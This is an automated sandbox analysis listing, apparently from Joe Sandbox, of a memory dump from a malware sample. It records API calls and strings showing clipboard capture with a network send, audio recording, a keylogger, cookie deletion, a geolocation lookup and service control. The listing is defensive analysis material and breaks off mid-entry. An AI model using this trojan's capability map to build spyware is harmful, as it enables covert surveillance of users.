                                      • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                      • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                      • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                      APIs
                                      • OpenClipboard.USER32 ref: 00414F41
                                      • EmptyClipboard.USER32 ref: 00414F4F
                                      • CloseClipboard.USER32 ref: 00414F55
                                      • OpenClipboard.USER32 ref: 00414F5C
                                      • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                      • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                      • CloseClipboard.USER32 ref: 00414F84
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                      • String ID:
                                      • API String ID: 2172192267-0
                                      • Opcode ID: b705e480321d6b7e2d884c8950b1be17994b9b0e0c0111f144bf8d2699d18b88
                                      • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                      • Opcode Fuzzy Hash: b705e480321d6b7e2d884c8950b1be17994b9b0e0c0111f144bf8d2699d18b88
                                      • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                      APIs
                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                      • __fassign.LIBCMT ref: 00447814
                                      • __fassign.LIBCMT ref: 0044782F
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                      • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                      • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                      • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                      • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                      • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                      APIs
                                      • _strftime.LIBCMT ref: 00401D30
                                        • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                      • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                      • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                      • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                      • String ID: %Y-%m-%d %H.%M$.wav
                                      • API String ID: 3809562944-3597965672
                                      • Opcode ID: 8b30251ab7800bb84685c89ea28ba2cf5bad43ee5a890a97e3db3087c812e5f4
                                      • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                      • Opcode Fuzzy Hash: 8b30251ab7800bb84685c89ea28ba2cf5bad43ee5a890a97e3db3087c812e5f4
                                      • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                      APIs
                                        • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                        • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                        • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                      • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                      • API String ID: 1133728706-4073444585
                                      • Opcode ID: ab8811259b22e672b860a72569a2fe793ab9a58f8af18df7bdc2f9c18a28ff03
                                      • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                      • Opcode Fuzzy Hash: ab8811259b22e672b860a72569a2fe793ab9a58f8af18df7bdc2f9c18a28ff03
                                      • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4e3d8c9a568c57fb9dcdc880f5c8ebbc933660610661b36433ba77454d73a655
                                      • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                      • Opcode Fuzzy Hash: 4e3d8c9a568c57fb9dcdc880f5c8ebbc933660610661b36433ba77454d73a655
                                      • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                      • InternetCloseHandle.WININET(00000000), ref: 00419407
                                      • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 004193A2
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                      • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                      • Opcode Fuzzy Hash: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                      • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                      APIs
                                        • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                      • _free.LIBCMT ref: 0044E128
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 0044E133
                                      • _free.LIBCMT ref: 0044E13E
                                      • _free.LIBCMT ref: 0044E192
                                      • _free.LIBCMT ref: 0044E19D
                                      • _free.LIBCMT ref: 0044E1A8
                                      • _free.LIBCMT ref: 0044E1B3
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                      • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                      • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                      • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                      APIs
                                      • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                      • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                      • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                      • Opcode Fuzzy Hash: a51cd608757b9cf21dde5cb3b99bb74488ace4818edb59339c74db540250a301
                                      • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                      • GetLastError.KERNEL32 ref: 0040AA28
                                      Strings
                                      • UserProfile, xrefs: 0040A9EE
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                      • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                      • [Chrome Cookies not found], xrefs: 0040AA42
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                      • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                      • Opcode Fuzzy Hash: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                      • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                      APIs
                                      • __allrem.LIBCMT ref: 00438A09
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                      • __allrem.LIBCMT ref: 00438A3C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                      • __allrem.LIBCMT ref: 00438A71
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                      • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                      • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                      • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: eba01cb7e667bf10c13e1131eb8d53c0a733c53fb11b583ea7a9a5fabebc0a3a
                                      • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                                      • Opcode Fuzzy Hash: eba01cb7e667bf10c13e1131eb8d53c0a733c53fb11b583ea7a9a5fabebc0a3a
                                      • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 2936374016-3206640213
                                      • Opcode ID: 57e5036cd7783279a466902622085f7a15e34eba906f96654b679836998df48b
                                      • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                                      • Opcode Fuzzy Hash: 57e5036cd7783279a466902622085f7a15e34eba906f96654b679836998df48b
                                      • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                      • int.LIBCPMT ref: 0040F8D7
                                        • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                        • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                      • std::_Facet_Register.LIBCPMT ref: 0040F917
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                      • __Init_thread_footer.LIBCMT ref: 0040F97F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID:
                                      • API String ID: 3815856325-0
                                      • Opcode ID: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                      • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                      • Opcode Fuzzy Hash: 884822b495c0d911e7e6d260955d18b9f199f61a7b6913d9d71a9645d575b0f3
                                      • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID:
                                      • API String ID: 493672254-0
                                      • Opcode ID: ef961517fa7d3ec0fb97854beed712d926a6d939b3a54f02cc84836da3cf2574
                                      • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                      • Opcode Fuzzy Hash: ef961517fa7d3ec0fb97854beed712d926a6d939b3a54f02cc84836da3cf2574
                                      • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                      APIs
                                      • GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                      • _free.LIBCMT ref: 0044575C
                                      • _free.LIBCMT ref: 00445784
                                      • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                      • SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                      • _abort.LIBCMT ref: 004457A3
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                      • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                      • Opcode Fuzzy Hash: beb673fc776bdcf0cb4aa2f907b8faed87466b0c6696de81e80bb7a9f8cba6db
                                      • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 2ba267917800a0f78745fc56a1fa07470a6e78eb0d7a781ed226daf7a2918e93
                                      • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                      • Opcode Fuzzy Hash: 2ba267917800a0f78745fc56a1fa07470a6e78eb0d7a781ed226daf7a2918e93
                                      • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 3b9b7fcf680c0254142173201a2c159ee2d6d2b1c7f584309789e655410e612f
                                      • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                      • Opcode Fuzzy Hash: 3b9b7fcf680c0254142173201a2c159ee2d6d2b1c7f584309789e655410e612f
                                      • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 6e03f1b5d5325c1959145fcca3b44fa5415162ebc8b4097e2b224981fdd9f7af
                                      • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                      • Opcode Fuzzy Hash: 6e03f1b5d5325c1959145fcca3b44fa5415162ebc8b4097e2b224981fdd9f7af
                                      • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A0BE
                                      • wsprintfW.USER32 ref: 0040A13F
                                        • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      • API String ID: 1497725170-248792730
                                      • Opcode ID: ef74cc9584c32053aec7cc819f71dce24a514f43db1759c980d8371a29d5f571
                                      • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                      • Opcode Fuzzy Hash: ef74cc9584c32053aec7cc819f71dce24a514f43db1759c980d8371a29d5f571
                                      • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                      • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID: h G
                                      • API String ID: 1958988193-3300504347
                                      • Opcode ID: 7bf423a99ca2aa583c2b06c79dd12d055ce5ada4efbbe580e9862ecf80d1a99f
                                      • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                      • Opcode Fuzzy Hash: 7bf423a99ca2aa583c2b06c79dd12d055ce5ada4efbbe580e9862ecf80d1a99f
                                      • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 0041B310
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                      • GetLastError.KERNEL32 ref: 0041B335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      • API String ID: 2877667751-2410386613
                                      • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                      • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                      • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                      • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                        • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                      • _UnwindNestedFrames.LIBCMT ref: 00437631
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                      • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID: /zC
                                      • API String ID: 2633735394-4132788633
                                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
